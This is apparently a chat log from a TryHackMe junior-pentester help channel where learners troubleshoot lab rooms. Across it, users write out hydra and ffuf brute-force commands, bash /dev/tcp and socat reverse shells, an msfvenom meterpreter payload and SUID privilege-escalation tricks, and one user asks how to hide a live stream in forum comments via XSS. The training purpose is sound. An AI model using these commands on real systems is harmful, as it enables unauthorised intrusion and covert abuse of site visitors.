#junior-pentester-path
Yeah, I am still not seeing the answer that TryHackMe wants. I see the source code, but I cannot find the answer. I'll keep looking further into it, thank you for the help
Gave +1 Rep to @ornate comet (current: #789 - 4)
Also follow all links on the page
Can you please DM me a screenshot of how you found the answer, or send a video? I tried looking for it but I think I am not looking in the right place
Sorry, I am on my phone right now
Did you right click on the page and go to "View Page Source"? This should take you to view-source:http://10.10.x.x/ at which point you read through the small amount of code on the page. The hint within the question says to ||go to the link mentioned in the comment. The text that is in the form of comments should be in green so look there.||
Hey, just did the netsec challenge, and at first the Hydra brute force was taking FOREVVVERRRR and I finally figured it out. When I add '-t 64' to increase the number of parallel channels, it slows down the attack immensely. I can't figure out why and can't find anything googling it. Anyone know why?
hydra -l quinn -P /usr/share/wordlists/rockyou.txt 10.10.129.165 -s 10021 -t 64 ftp
is 100's of times slower than:
hydra -l quinn -P /usr/share/wordlists/rockyou.txt ftp://10.10.129.165:10021
It was probably due to the target not having enough resources to handle and to respond to 64 simultaneous threads in a single request or process.
That makes sense. Follow up: let's say you're trying to optimize for speed, is there a way to quickly ascertain the fastest number of channels besides run, watch for 1-2 minutes, cancel, then try another combo?
I'm a beginner myself so that's what I do. 😅
Let's wait for other experienced ones to chime in.
I'm struggling to get through the Authentication Bypass room, the AttackBox just won't run ffuf as it's supposed to
Can you verify and screenshot?
Screenshot what?
The error
Oh, it's not giving me an error, but I'm not getting the right output even though the command is correct
Yeah, the problems with some programs when the columns and rows are not the expected sizes... fun
Didn't help, but thank you
Gave +1 Rep to @remote iris (current: #2 - 1851)
ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.196.64/customers/login -fc 200
v1.3.1
:: Method : POST
:: URL : http://10.10.196.64/customers/login
:: Wordlist : W1: valid_usernames.txt
:: Wordlist : W2: /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : username=W1&password=W2
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response status: 200
:: Progress: [5/100] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors::: Progress: [100/100] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Error:: Progress: [100/100] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::
I'm just getting this, I should be getting at least one W2: Password and W1: Username
Anyone capable/willing to walk someone who's apparently skipped cookie manipulation and web tech most of their career... through how to do both authentication bypass as well as local file inclusion within a manipulated cookie?
I have the first part down, not a problem. But I'm apparently an idiot and am missing the second part.
What does your valid_usernames file look like?
I fixed it but thank you ☺️
Gave +1 Rep to @prisma raptor (current: #22 - 338)
Might the Burp module, specifically the Other Modules part, need an update? According to the text in Task 8 I need to select the "Form field" radio button, but this one is greyed out. Have read that others are experiencing the same, but no solution was given. Can't continue now 😦
Anyone have some time to help with some tips or hints on file inclusion via cookies?
I had trouble with that too. It's hard to explain, but the way I fixed it is by capturing the initial request in the proxy and sending it to Repeater, then sending the request in Repeater and using the 'follow redirection' button at the top, which will then generate a GET request. That's the one you want to then send to Sequencer (through the right-click menu).
@fluid lance thanks! I will try that out 😉
Gave +1 Rep to @fluid lance (current: #428 - 10)
I don't understand the second-to-last and last paragraphs. I don't get what the stars mean here
The computer was looking for two pings it expected to receive, but instead got none.
Hey, in the room Ripper, what to do after finding the password of root.xlsx? Tried to log in to SSH but it's not working
Is there something wrong with the server hosting the Local File Inclusion challenges? Most of the time even browsing the site causes my browser to just spin and spin. It's like the server hosting the site is out of memory or something
Did you add the required entry in the /etc/hosts file?
Can you provide the link to the room?
I think you might be referring to a different room. In the one I'm talking about you only have to access the server at "http://IP/challenges/index.html" or something similar.
I finished it and there was no need to edit /etc/hosts. You just read flags in /etc/flag1, etc...
Some of them you have to change the request from GET to POST and whenever I did it would hang for a long time, then run really slow after. For challenge 3 it was really bad.
It doesn't matter now, I finished it, but it was definitely running slow and spotty.
Hi, I'm currently in the "What the Shell?" room and I'm having problems logging into the Windows machine through evil-winrm. As far as I understand the syntax goes something like this: evil-winrm -i IP -u user -p password, but I get a WinRM authorization error. Does anyone know what may be causing this?
Can you share a screenshot of the actual error (When I tried to search the error, Google suggested that it might be authentication error instead)? You'll need to verify your account to do so.
Got hopelessly stuck on the Linux privesc crontab task before looking it up and realising I needed to make my file executable for it to work 🤦
It can happen to anyone. Just make sure you add it in your notes. 👍
I want to start buffer overflow, so where can I start?
Anyone on "Content Discovery" and can't get the support page to load? http://MACHINE_IP/robots.txt
I'm getting an HTTP error code 405
Have you clicked on the green Start Machine somewhere in the first few tasks?
Yep lol
I just gave up will try again later
You'll have to wait for a couple of minutes for the attached VM to fully spin up and do check if you are connected to THM OpenVPN.
I'm on Linux priv esc Task 11 and I keep getting exec format errors when I try to run the C file on the target machine
I did it through Kali first and then through the attack box
I created the directory /tmp/backup, mounted it on the NFS shared folder (?) /home/backup, created the file nfs.c, gcc'd it into just nfs, added the SUID bit with chmod +s, and then tried to run it with ./nfs from the target machine
Both nfs and nfs.c are showing up on the target folder properly, and with proper permissions too
so any advice on how to fix the exec format error?
Is this the one where you use it over SSH?
Yeah, I SSH into the target machine and then make changes to the NFS from the attacking machine
Did you compile the nfs.c in the attackbox or the ssh?
Yeah.
That's why it might not work.
When you compile something, you're giving it system variables; since these differ from environment to environment, you'll need to compile it on the environment you wish to run it on.
So I should compile nfs.c on the target machine?
🙂 yes.
Then it should assign it all the stuff it needs from the machine, and it would become a better executable.
Awesome, thank you
And just so i can use the proper language: I found /home/backup in /etc/exports. Would I say that /home/backup is an NFS shared folder or something?
If it's set at that, yeah, you can learn more HERE about NFS enumeration, this is also a good website.
Beautiful, thank you
Gave +1 Rep to @remote iris (current: #2 - 1887)
I'm having trouble compiling - gcc isn't available. I can't find another compiler online to use, either. is there something slick I can hit nfs.c with inside of the target machine that I'm not seeing?
EDIT: figured it out - I did chmod ugo+rwx nfs from the AttackBox and that solved the issue
I did this task just earlier this week; I used --static when compiling to make it work, but it was tricky to figure out
What's that do?
Also I ran the file from a different NFS folder - home/ubuntu/sharedfolddr instead of /home/backup
I think it makes the compiled file have no dependencies. Also, I wasn't able to access the /home/backup folder to run the file, so I just used /tmp
I used this option as well initially.
Is there a better option?
Interesting, thank you!
Gave +1 Rep to @prisma raptor (current: #19 - 370)
Hello
I'm having trouble solving Task 11 of the Linux Privilege Escalation room
in the Jr. Penetration Tester pathway
This is the error I'm getting when I use the exploit compiled on my Kali machine
Does anyone know how to compile an exploit with a specific GLIBC version?
Can you use gcc?
Not on the victim machine
The NFS PrivEsc Vector
Which task?
For whoever is having NFS issue in task 11, use the flag "-static" when compiling. You're welcome
Why not copy bash from the server and setuid it on the local mount, then just play with ./bash -p?
Well, that sometimes works... a better option is to live off the land and copy a binary on the target machine to the NFS share folder that you can then set the SUID bit on, to exploit using things like those recommended on GTFOBins
I'm sorry. Can you please elaborate on this approach? I did not get it
On the server, copy /bin/bash to the shared folder
From local as root: chown root:root bash && chmod +s bash.
After that, check the bash permissions on the server and try to run it with ./bash -p
Ok Thanks for the explanation. I will try it now
Hi all, I'm having trouble on this step. Authentication Bypass room, step 3. I created the .txt but the command cannot find it. What am I staring at that I can't see? lol
Can you ls and see if you can see it?
@remote iris yes, it's in Desktop
Is the terminal in the same directory?
Yes, I'm using the default AttackBox if that helps
Can you verify and show screenshots?
Can you type ls and show me the output only of the terminal?
You're no longer in the Desktop directory
Now run the command from that directory
Ohhh lol, I read that direction so wrong! Thank you
No worries 😄
learning windows privesc has felt way more convoluted than linux privesc lol
Anyone else get the impression that all these hacking academies that have popped up recently are just a money grab? Most of this stuff will never be found in the wild unless you're hacking a personal IP, in which case you're in handcuffs. And AI is coming on fast, soon negating what's being taught right now (at a low low price), with adaptive LLM WAFs and the like. And we're all just suckers?
Prove me wrong.
please
true
not only that have popped recently
Hello, I'm doing the What the Shell? room, at Task 7. For the last question, should we not also add verify=0 for connecting to the listener?
Thanks
You should. What was the accepted answer?
@prisma raptor socat OPENSSL:10.10.10.5:53, EXEC:"bash -li",pty,stderr,sigint,setsid,sane
Mine had verify=0 in it. Probably due to answer tolerance.
Oh yeah surely
In practice we should; if not, we could not validate the certificate, right?
Yes and it will throw an error or refuse the connection.
Okay, I see, thanks!
Gave +1 Rep to @prisma raptor (current: #18 - 387)
Is that a bot which counts every help? lol
Based on certain key words, yes.
Oh yeah funny
Can't exchange it for anything though.. so I simply don't mind it at all.. 😅
Haha sadly
I'm getting a bit confused in Authentication Bypass, Username Enumeration. I put the command in, and I got a large brick of text as a return. I can see the names I am looking for when I look very closely. But after checking a walkthrough video I noticed they don't get the massive text brick I do from the same command
this is the command as entered
it looks like you resized your terminal after running the command
Hi, I have a problem with a room, Tools of the Trade Windows Privilege Escalation. I cannot complete the task, and it is just click and complete 😦
Can you provide a link to the room? Have you tried to refresh the page and click it again?
Hello everyone, I have a question please. In the SSRF room, we modify <value=assets/avatars/img1.png> to <value=/private> and there's a deny list on "/private", so the room's solution is <value=x/../private>. But when I did it my own way before, which is <value=./../private>, it doesn't work. Don't x/../private and ./../private both resolve to the same directory? ChatGPT for one says that, and is there an "x"-named directory I'm not aware of? Thanks to anyone who answers 😄
Reread the last 4 paragraphs of the practical.. it explains to you why the x is needed to bypass the filtering.
Did you at least read my question before answering? Because it doesn't seem like you did.
I absolutely read your question, and in the teach-a-man-to-fish vein of thought, I was pointing you to the section of the room which explains why the x is needed and why x/../private and ./../private are not the same thing
x just happens to be an arbitrary value of some thing that "is not /private", so you get past the filter and then traverse the way you want.
I have a question kinda similar about THM specifically. I know I just started, and there's many more modules to go, but it feels like many of these hacks aren't really practical to real life. Do they get more similar to the real world as the modules get more advanced?
And not just more similar but actually usable if I want to work as a pentester?
The vulnerabilities you leverage to gain a foothold, pivot and escalate your privileges are based on real-life vulnerabilities and misconfigurations. These may not be set up or configured in the exact same way, but can be exploited in actual environments when not configured or adequately protected / patched.
The technical know how you gain and the mindset, for sure.
Got it thanks
Gave +1 Rep to @prisma raptor (current: #16 - 417)
However, in actual environments and real-life engagements, there are other factors you need to consider, such as limitations described in the rules of engagement (whether or not you are allowed to exploit vulnerable services or testing these should suffice), agreeing the engagement scope, etc.
and (hopefully) many of the lessons learned have been mitigated in security conscious newer systems.. some of the things and exploits you are learning are older for sure, but its' about learning the concepts for application later.
Yes, the mindset and technical knowledge are the building blocks. You might run into some of these exploits in the wild, but unlikely. Most networks, apps, whathaveyou, are updated to the latest and greatest, so you will need to learn about cloud architecture like AWS, GCP and the like, along with Active Directory and more advanced topics, to find any real-world application. But it all depends on what your goal is. If it's pentesting, then most of what is covered in THM will be practical. If it's bug bounty, you'll need a lot more learning. If it's red teaming, join the military.
Hello, for any help about this path, can I post it here? 🙂
yes
Okay, thanks!
I'm currently learning about RFI. I have to try out an RFI attack on dedicated labs, but how am I supposed to do it? I mean I have no server of my own, not even a local server... and if I'm not wrong, I need one. How am I supposed to do it?
You can look at the Juice Shop and DVWA rooms in THM.
thank you !
Gave +1 Rep to @prisma raptor (current: #16 - 419)
Sorry for the misunderstanding then! But let's say that in reality we are in the /Public directory; of course /Private is blacklisted to access, but you can access other things such as "x". If I launch ./../Private, wouldn't that resolve to /Public/../Private? If anything, the server should return no "x" directory found, so my thought was: let's use the current directory and traverse that way, but I seem to be missing some important parameter here 😦
Ok got it thank you
Gave +1 Rep to @indigo swan (current: #1997 - 1)
What do you recommend I do once I finish all the pathways?
If someone is on flag3 for the challenge from the "File Inclusion" room, feel free to come on the voice channel if you want to do it with me
There are lots of boxes to do that are not part of the pathways.
Yes as @prisma raptor said, do more boxes. Continue learning. Maybe start studying for a certification.
Alright folks - this isn't really a question regarding an issue I'm currently having within the Jr Pen Test path. So I've been slowly burning through the pathways trying to fully understand each aspect before I move on. However, since going onto the File Inclusion paths and the SSRF paths, I'm just struggling to fully understand and get to grips with what is happening. Is this something to expect as it's a really early/beginner path and I should just keep going, or is there another resource I can look at just to get to grips a little more? I don't know if I've understood the other parts of the path easier because I'm a little more aware of them due to my job and these ones are just a bit more benign to me.
As you said, this is a junior-level pathway so the intent is to introduce the concepts and give you a basic level of understanding for each. Should you want to practice on these, there are rooms in THM you can do a practice on to hone your skills better. You can also look at the Web Security Academy to supplement those application-related ones.
cool thanks again
Gave +1 Rep to @indigo swan (current: #1322 - 2)
michael78043: 0 Rep (##ω)
You're still on cooldown
Ye, thanks for the clarity, didn't know if I was meant to be understanding things a little more. I was able to complete the section with relative ease but the theory just didn't seem to stick, but I'll keep powering through. Cheers for the response
Gave +1 Rep to @prisma raptor (current: #16 - 423)
Yes, doing more practice will hammer home the point or concepts.
Hey, I have a question. I'm learning about SQL injections. I'm currently using the command below to guess the full name of the database letter by letter. But how am I supposed to know that I found the complete name of it? (In the example the full name is "sqli_three", but how can I know that it's sufficient and there are no following letters like "sqli_threes"?) Thanks in advance.
You can try databases() = 'sqli_threes' it will then be false 😄
LIKE makes you try wildcards, and '=' makes you check if it's true
Yeah, I finally found it by myself today, but thank you! 🙂
Gave +1 Rep to @echo geyser (current: #2000 - 1)
I have a question about XSS or the likes. If I’m trying to embed a hidden live stream video into a XSS injection. So when visitors view the forum/blog comments. They are watching the live stream without knowing. Is that at all possible with XSS? If not, what would the best method be to accomplish that?
Hi, there is an error (not updated questions) on the Passive Reconnaissance room: shodan.io for nginx
There is a mistake in "Nmap Live Host Discovery" > subnetworks
How many devices can see the ARP request? It can't be the answer that it asked for... A switch will never send an ARP back from the port that received the frame
Hello all,
I am in the Command Injection room, Task 5.
I have to test some payloads to answer the second question:
What are the contents of the flag located in /home/tryhackme/flag.txt?
I can't find the exact payload to use to find/open/get it.
Any help please?
What have you tried?
I used the cheat sheet provided. Tested plenty of propositions, a little at random I must admit, guided by my beginner level knowledge of some commands.
The closest I got was to find | dir which gave me the current content of the folder
Could you please be more specific / give some clues?
I understand cd might be of use but I can't get to change the current path
Solution I found involved cat
Yeah, I thought you knew Linux basics on how to use the CLI?
The basics, I'll gladly refresh that in the Linux rooms
Hi, I would like to ask for some other way to do this room, Linux Privilege Escalation (https://tryhackme.com/room/linprivesc), Task 12 capstone challenge Q2 for the flag2.txt file located in rootflag. I did look up a walkthrough for this part, and I'm not understanding why it was suggested to use the following command to read flag2.txt after getting into the missy user, which is: sudo find . -exec /bin/sh ; -quit. I tried to find it in GTFOBins as well as on Google, but I still can't understand how this command works properly. From what I'm guessing it's saying to find any executable way to run /bin/sh to open a shell, then quit it..? I'm sorry if I'm missing out any info that I should have known, but I would appreciate any help to let me know how to understand this command, and how did you solve question 2 if you have done it before. Thank you
https://blog.morphisec.com/unveiling-uac-0184-the-remcos-rat-steganography-saga
Learn about Steganography in under 30 seconds ↴
GTFObins lists "Unix binaries that can be used to bypass local security restrictions in misconfigured systems." For example, if the SUID permission is set for this precise binary, or if the user has sudo rights for it. So, "find" is not used to find anything per se, but to "break out from restricted environments by spawning an interactive system shell" with the "find . -exec /bin/sh ; -quit" command.
How did you RDP to the Windows machine? Sorry, got the solution / way through by using the Remmina command in the Linux box
How to fix segmentation fault (core dumped) while executing the .elf file? I got this in the Metasploit exploitation room while executing the payload on the target
What exploit are you running and the payload? Are you using the correct exploit that corresponds to your OS architecture (x86 or x64)?
Anyone ever managed to complete Task 11 (NFS) of the privilege escalation module from a Mac?
I can complete it fine from a Kali VM, but if I try the same from a Mac, when I try to execute the binary that should give me the shell, instead I get the error: Text file busy
So, just curious if anyone else managed to do that from a Mac or has an explanation for that
On the Metasploit: Exploit Room > Task 5. I found the exploit to use, but only because I browsed around and eventually saw someone on a forum that was on this task too. || I didn't realize that the exploit would be based off of what operating system was running, rather than the services running on the OS. My main question is, I like to search for exploits locally, is there a way to search by operating system exploits? Or just continue to use google for that ||
In exploit-db, you can search for exploit by software, but if you are looking for an exploit code in github, I'm afraid you'll have to do it via Google.
You can also use privilege escalation scripts that could identify potential exploits to use such as linpeas / winpeas, linux smart enumeration, linenum, windows exploit suggester, and the like.
Thank you!
Gave +1 Rep to @prisma raptor (current: #15 - 444)
I have this same issue... In my understanding the Answers to all three questions in the Traceroute part are wrong... They are looking for the targets and not the router before the target in the first two questions and it's not 26 routers between as the 26th is the target...
Or am I wrong with this?
I have a question to the room Vulnerabilities 101. Who is the author of exploit-db? It should be either Offensive Security or str0ke but none of the answers work. Any clues?
Got it.. it's OffSec. Damn, that's harder than it had to be. These questions are annoying, seriously
Hi, I'm having trouble with #6 on subdomain enumeration. I'm using the Kali machine and when I issue the command, it shows the following error message:
is this using the attackbox or a VM on your machine?
I'm using the Kali box
What Kali box?
It gave me the option of AttackBox or Kali, so I chose Kali because I was getting the same error messages from the AttackBox. The web-based Kali box
change SecLists to seclists (all lowercase)
ie /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt
that's working. it just takes some time 😛
also, if you make that terminal slightly wider, it will just replace the bottom line on failure instead of writing to a newline.
Question: In the Windows PrivEsc room: Abusing Dangerous Privileges there is the SeBackup / SeRestore example. But then, when issuing whoami /priv the output shows:
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
Can someone explain why they are clearly disabled...?
Is that the room by Polomints or 1337rce?
Hello, a question about white-box testing. It states in Task 4 in Pentesting Fundamentals that white-box testing is more time consuming to do; wouldn't this type of testing be quicker since you know most of the stuff about the source code? Or am I overthinking this?
From my understanding, you are expected to do more tests in a white box test. Aside from the need to go through whatever documentation that has been provided, you may be required to do tests in the context of different users to determine if there are access control weaknesses or controls that can be bypassed.
Can you share the link to this box?
I can't, it's a private network
But you can try the same in the TryHackMe Linux Privilege Escalation room
In that one also it's not working if you use the tmp folder
If it is PATH variable manipulation, there should be a process (e.g., cron job) or binary that is being run by a privileged user such as root or via sudo or SUID bits. And you manipulate the system into executing your malicious binary instead of the legitimate one by adding its path in the PATH environment variable. In your screenshot, you even added a SUID bit which isn't clear to me what the purpose is.
then how can we use this method for privilege escalation if we already need root?
I updated it to include the response to your question
Got 3 questions correct but stuck with the third question, the "What is the directory listing flag?" question from the Walking an Application task.
https://10-10-45-128.p.thmlabs.com/thm-framework-login.index or tried .html
https://10-10-45-128.p.thmlabs.com/ main URL
flag.txt file
And THM{CHANGE_DEFAULT_CREDENTIALS}
Didn't work. Anything else I need to do?
With the bruteforce, it is easier to find the directory listing like using Nmap but here I do not know how to get it
Need help please.
You use gobuster or similar for forced directory browsing
Hey all,
I need a little help with task 6 on
https://tryhackme.com/room/walkinganapplication
I do not see contact request form after I click Network tab in the Inspect element option.
have you filled in the form and clicked "send message"?
No actually I do not see the form at all in the request page
@flint idol
Wish I could send image of how it is looking my side but I do not see an option to send images here
you need to verify your tryhackme account in order to post images here
This is how it is showing my side with no contact form in the requests page.
Try adding some text to the boxes on the "contact us" page, then click the green button
Okay, let me see
Idk why but this site https://10-10-1-210.p.thmlabs.com/ is getting a 504 timed out error. It works for a certain time and now it's not working. I tried reconnecting to the VPN but it didn't work, and also in the attacking machine, if I'm trying the site. I'm good to enter the URL directly instead of VPN and all, right? If so, it is doing the same error.
is the target machine still running?
Yes it is running still
what IP does it have? if you restarted the machine, it will have a different IP, and the above link will no longer work (resulting in a 504 error).
Yes, the IP address changes, but after the restart as well it didn't work this time
check the first section again. if the ip address changes, so will the url you need to use.
You mean VPN IP address right?
If it is, then the IP address is same even after disconnect and reconnect of VPN
i mean this. if you restarted the target machine, this will have changed.
Using the built-in AttackBox this works for me right now at the moment.
Start the virtual machine on this task, wait 2 minutes, and visit the following URL: https://10-10-193-175.p.thmlabs.com (this URL will update 2 minutes from when you start the machine)
I'm using this, and it's not working
That URL is working for me just fine
(it's different from the one before)
https://10-10-1-210.p.thmlabs.com/ -> 504 error
https://10-10-193-175.p.thmlabs.com/ -> ✅
Yeah, even worked for me till morning. Whenever I started working on task 6 contact request form, It went out
Yeah, you're true. THM should update the URL or do the necessary changes.
What build are you talking about? Could you please let me know? Maybe next time, if I encounter the same, I may give it a try
Built-in*; at the top of the page you can start an AttackBox
Okay, URL is the issue. Thanks @jaunty notch
Gave +1 Rep to @jaunty notch (current: #2022 - 1)
Hey all
I'm in this task Manual Discovery - Sitemap.xml
As per the question
What is the path of the secret area that can be found in the sitemap.xml file?
I accessed the link in attack machine http://10.10.45.191/sitemap.xml using firefox, then I found the secret in local path where it takes me to Acme IT Support website http://10.10.45.xxx/s3cr3t-area when I access this secret path link, I got "You found the sitemap endpoint".
I entered the secret path http://10.10.45.xxx/s3cr3t-area but still it's not working
Anything else I need to work on?
empty the text field and look at the answer format
it most likely only wants the /s3cr3t-area as answer
@pseudo coral ⬆️
@sage current I got the answer. Thanks tho!
Gave +1 Rep to @sage current (current: #4 - 1664)
no problem
On File Inclusion Room Challenge #2, why does my Burp Intercept tab not pick up anything when I refresh the page? How to make it work? Is there something that needs to be done in the configuration of Burp?
Are you using Chromium or Firefox?
It's okay now, I just forgot to turn on FoxyProxy
Where can the path of data.html be found? Tried checking the root and Desktop directory but it doesn't exist there.
nvm.. managed to make it work
Having issues with starting Authentication Bypass.
http://machine_ip/customers/signup shows up as an error. I'm connected to the AttackBox through OpenVPN, have ensured I was connected by testing 10.10.10.10, but still nothing
I replace "machine_ip" with my VPN IP but nothing
It's not the VPN IP you use.
I can't seem to find the IP that's needed
you need to start the machine associated with the task
That's quite right.
"Error response
Error code: 405
Message: Method Not Allowed.
Error code explanation: 405 - Specified method is invalid for this resource."
That's the attackbox IP.
Read that doc please.
I'm an idiot and knew that. I need more coffee. Thanks and sorry for being so dumb this morning lol
No worries, we'll let you off since you're new 😉
😄
Which room are you working on?
blue
but then i started another meterpreter session and it was working
I’m having an issue with the crontab task in linux priv esc; I’ve modified the backup.sh script to create a connection to my machine with
#!/bin/bash
Bash -i >& /dev/tcp/[my machine IP]/7777 0>&1
Listening on my machine but no connection is coming in; I’ve tried both the eth and tun0 address
Did you chmod the cron? Or at least have it in the path?
It’s in the path and i did chmod to executable, still not picking it up
And the cron is not specified to run in any interval, which automatically runs every now and then
Did you have a capital 'B' in your payload?
I’ve gotten through, my ISP misbehaved so the connection to THM server had been severed; that’s why the listener wasn’t picking up
Thanks
Gave +1 Rep to @prisma raptor (current: #15 - 463)
I'm facing another problem in the NFS privilege escalation task
Getting this GLIBC error when trying to run the executable on target system ./shell: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.34 not found (required by ./shell)
I've researched the error and the solution I'm seeing requires updating glibc-source, which is not possible on the target system.
Any pointers that can help please?
I'll check it out, thanks
Gave +1 Rep to @prisma raptor (current: #15 - 467)
Hello everyone, I'm currently unable to pass task 2: OSINT - SSL/TLS Certificate because the https://crt.sh server is currently down and I'm required to get a domain logged on crt.sh at 2020-12-26
Anyone able to give some assistance to the username enumeration with ffuf section in the JR pentester
its under Auth bypass
Hi! Were you able to figure out how to pipe the whole thing and create valid_usernames.txt and add the usernames that you found using ffuf? I'm also stuck
Hey, I created a text file on the desktop, stuck the names in there and named it accordingly. The next command didn't work and I had to move the terminal file and the txt file into a folder, as it wouldn't allow me to run it with them both on the desktop
Never piped before, tried to google it but just did a workaround instead
@ocean bay
Awesome, thank you. I think I more or less did the same thing, although I'm not sure how you were able to extract the names from the terminal. I had ChatGPT help me formulate this line so I could save the result in the file and then read through it with the cat command: ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.215.149/customers/signup -mr "username already exists" | tee -a valid_usernames.txt
i just typed them into the text doc manual extraction 🙂
is " OSI Model " really matter in pentesting ?
Sorry dude, am I supposed to see the results of the ffuf in the terminal? because when I do the brute force part that comes after Username Enumeration, I only get the ffuf logo, the details of the attack (method, url etc) and some lines about the progress and if there were any errors. When I try to save the output in a txt file I get some random JSON code. I don't understant if the actual result should appear on the terminal (which doesn't) or am I missing something
You aren't supposed to pipe the output of ffuf into the valid_usernames.txt as the output will be wonky and won't be usable for the next step.
It's very helpful for teaching the concepts, but I don't think going too deep into each layer will be necessary IMHO. Further, the TCP/IP model is used in practice.
It suggests to pipe it in the section though?
It does? It says otherwise in Task 3?
You're right, it does. I'm tripping, wtf, I was looking at this at midnight
Could have sworn it suggested to pipe over just typing, but you're right, it says otherwise
Technically, you can still use the output, but you'll need a script or equivalent to clean the output.
Anyone able to give some insight on how to solve the challenges in the file inclusion room? Had a little google and it was saying to use something like Burp Suite, but that is later on in the jr pentester course, or am I missing something?
You can use burpsuite, or you can use the URL.
Just append the website URL
Burp just makes it easier.
okay i can just modify the url and get the same output
Yeah 🙂
okay, never used it, so I was a little bit confused why I got suggested to use it when I've not even covered it yet and it's later in the course
thank you though will try and nail it
Why did Challenge 3 in the fileinc room work with curl but not when changing to post on the network tab?
Hi, I am on linux privilege escalation. Why is this SUID vulnerable when I am not the root user and only the root user has the 's' permission?
1722 44 -rwsr-xr-x 1 root root 43352 Sep 5 2019 /usr/bin/base64
it allows users who execute the file to temporarily assume the privileges of the file's owner
In that case the owner is root
so even when the permission 'rws' is for the owner of the file, the s allows a normal user to assume the privilege of the owner? I am a bit confused, because others only have execute permission, not the 's' permission
So you can use that to encode a file owned by root (ex: /root/root.txt): you can use /usr/bin/base64 /root/root.txt | base64 --decode
okay, thanks
Can anybody help me out? I'm at the https://tryhackme.com/r/room/walkinganapplication room and after I paused line 110 I don't get the flag after refreshing this page? I'm in task 5 actually
How is it that "Vulnerability Capstone" is marked as "easy" but it is actually not that easy, since you have to change a lot in the script and also make it fit to work with python3. So the room needs better instructions.
There is a criteria that THM uses in assigning room difficulty. Also, understanding and changing code is a nice skill to have.
Well, some stuff is marked as "Medium" but is "easy", and other stuff is "easy" but actually should be at least medium.
But yeah, getting a code understanding is kinda nice to have, but I just get confused when it says: Do the steps as previous, but they are not as previous lol.
Especially when you have to search for all the issues because python3 and python2 work differently. 😄
can someone please help me with RFI?
what's your problem?
You can serve your payload or revshell using python http.server and use that to gain access
burp suite other modules task 7
after Sending to Sequencer can't pick the form field
programme cannot see the token
Follow the instructions step by step carefully
active reconnaissance task 5: when I use telnet on port 80 it doesn't work
Are you on the Attackbox or your own attack machine?
Doing the Burp Suite: Other Modules room, on task 8. I capture the request for admin/login in the proxy and send it to sequencer, however it's looking for loginToken in the response, not the request, and the 302 redirect you receive from the server only has a session cookie, not the loginToken. Not sure how to proceed here.
Have you made sure that you sent the Request (and not the Response) to the Sequencer from the Proxy ? I also made the mistake of sending the Response instead of the Request by right-clicking the wrong area.
Hi! In the file inclusion room, in the Local File Inclusion part, I'm having trouble understanding the second question. I found the result elsewhere but I just don't get why I don't find the name of the directory using the labs. From what I understand, I should be able to find the directory by searching index.php?lang=../../ since lang should be in languages/, right? But when I try it on the labs I see the error message showing the function include(), which sends you to the directory function.include, so I tried index.php?lang=../function.include ... what am I missing? I don't understand
I did, yes. I did end up getting it to work, but with some trickery - I sent it to intruder first, used auto to add section marks, and then sent it to sequencer, and then it worked. It was weird.
Hey yall. Metasploit exploitation room, task 6, question 4. We made our .elf, we put it on the victim machine using wget, we chmod'd it so it can execute, we execute..... and keep getting a segmentation fault. -_-
Admittedly I just used the metasploit payload from the example, am I supposed to be doing something different?
I figured I'd still use meterpreter so I could make dumping the hashes easier for the other questions in the task
What was the code you used to create the .elf file? Check you put it in the correct directory.
I just used the command from the example further up in the room: "msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={MY IP HERE} LPORT=4444 -f elf > shell.elf"
After wget and chmod I was executing it from the target's home directory - I didn't think that made a difference.
It was phoning home but closing immediately - the listener was telling me the connection was closing, and the segmentation fault error was on the target machine
- Did you check if the target's architecture is x86 or x64?
- Did you setup the multi/handler module and set the corresponding payload it expects to receive (as meterpreter payloads can only be received by the multi/handler module)?
Oooooo yes to 2, no to 1. I bet I messed that up. Thanks!
That did it. Thank you for the nudge in the right direction!
I finished this learning path today! Super excited, since it's my first intermediate path.
Any suggestions for Learning paths to explore next?
I would suggest to explore next Red Team and Offensive Pentest (for practice)
Awesome! I've been dabbling in Red Team and CompTIA PenTest+ a little bit. I'll check out Offensive Pentest too
Ah, thank you!
Gave +1 Rep to @prisma raptor (current: #13 - 512)
Sorry for late response left for vacation next morning. 🤣 Congrats on getting it to work.
Congrats ! Offensive path my favorite. I recommend the search also don't miss out on the rooms not in Pathways.
In the Authentication Bypass Room, with each task, we use a tool called cURL. Is this tool the best way to test communication with a website that you want to pentest?
I understand ffuf is a great tool, but curl basically enables us to communicate in a linux terminal?
There should be other ways, but that will depend on what is it you exactly wanted to do. From my understanding, the room used cURL to better demonstrate how we are manipulating the request to the target website.
Got it, Thank you!
Need help with JR Pen Test room Authentication Bypass task2 having some technical difficulties, linux commands are executing but no output
Can you post a screenshot of the issue you are having so we can better assist you? You'll need to verify your account to do so.
@minor wigeon
Could someone help me? I am stuck on File Inclusion Lab - Task 8; Capture flag2 at /etc/flag2:
Looks like the .php is automatically added. Might have to figure out a way to not have it add .php. Null byte?
I tried practicing subdomain enumeration room task 4, but when I run dnsrecon like it's shown on the task it does not choose the default namelist.txt in the dnsrecon tool for bruting the directories/subdomains on the domain
It's showing no valid directories specified or found within the tool (I cross-checked in the dnsrecon directory and could see the namelist, I don't know why it's not using the namelist file for bruting)
in my vm machine
What is the exact command that you ran?
Just checked the man page and -d refers to domain and -D refers to dictionary. Have you tried supplying a dictionary file?
